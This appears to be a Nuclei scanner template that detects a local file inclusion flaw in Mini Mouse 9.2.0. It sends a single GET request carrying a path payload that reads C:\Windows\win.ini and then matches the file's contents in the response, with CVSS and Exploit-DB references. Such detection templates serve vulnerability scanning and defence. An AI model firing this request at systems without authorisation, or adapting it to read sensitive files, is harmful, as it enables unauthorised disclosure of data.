id: minimouse-lfi

info:
  name: Mini Mouse 9.2.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Mini Mouse 9.2.0 is vulnerable to local file inclusion because it allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
  reference:
    - https://www.exploit-db.com/exploits/49744
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,edb,minimouse

http:
  - method: GET
    path:
      - "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
        part: body

# digest: 4b0a004830460221008edfd0642fce428b9afc5bab12cb461072d771fa4b0f480a4f66bc812359f3c0022100bbb865517426b422a4dbceee76d373a26032f6201344d5690af36607704c5076:922c64590222798bb761d5b6d8e72950
